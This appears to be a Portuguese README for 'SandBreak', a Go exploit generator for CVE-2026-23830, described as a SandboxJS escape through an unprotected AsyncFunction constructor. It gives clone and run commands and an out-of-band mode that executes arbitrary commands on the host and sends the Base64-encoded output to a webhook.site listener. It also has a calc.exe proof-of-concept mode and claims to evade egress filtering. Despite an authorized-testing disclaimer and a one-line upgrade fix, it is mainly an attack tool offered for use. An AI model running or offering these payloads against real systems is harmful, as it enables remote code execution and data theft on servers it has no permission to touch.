
Gera e entrega payloads de exploração para CVE-2026-23830, uma fuga do SandboxJS, com modos para exfiltração OOB cega e PoC local de calculadora. Suporta listeners HTTP/HTTPS e produz payloads JavaScript minificados.
SandBreak é uma ferramenta robusta de geração de exploits baseada em Go, projetada para explorar a vulnerabilidade de Escape do SandboxJS (CVE-2026-23830).
Esta ferramenta explora o construtor AsyncFunction não protegido em versões antigas do sandboxjs, permitindo que atacantes escapem do ambiente sandbox V8 e executem código arbitrário no sistema host. Ela suporta múltiplos modos de payload, incluindo Exfiltração OOB Cega, Defacement e RCE Baseado em Erro.
oob: Exfiltração de Dados Out-of-Band (HTTP/HTTPS) para cenários cegos.calc: Abre calc.exe (PoC Clássico).Clone o repositório e execute:
git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go
go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]
Use este modo quando não houver feedback de saída. Ele executa o comando e envia o resultado codificado em Base64 para o seu listener (ex.: webhook.site).
go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
Contorna com sucesso travamentos básicos de filtragem de egresso ao lidar com erros de rede.
Abre uma calculadora no servidor Windows.
go run CVE-2026-23830.go -mode calc
Atacante recebendo os dados do usuário do servidor via Webhook, apesar de não haver saída visual no site.
Esta ferramenta foi criada apenas para Fins Educacionais e Testes de Penetração Autorizados.
Atualize o sandboxjs para a versão mais recente, onde o construtor AsyncFunction é devidamente isolado no sandbox.
npm update sandboxjs
Autor: Meysam Bal-afkan
Licença: MIT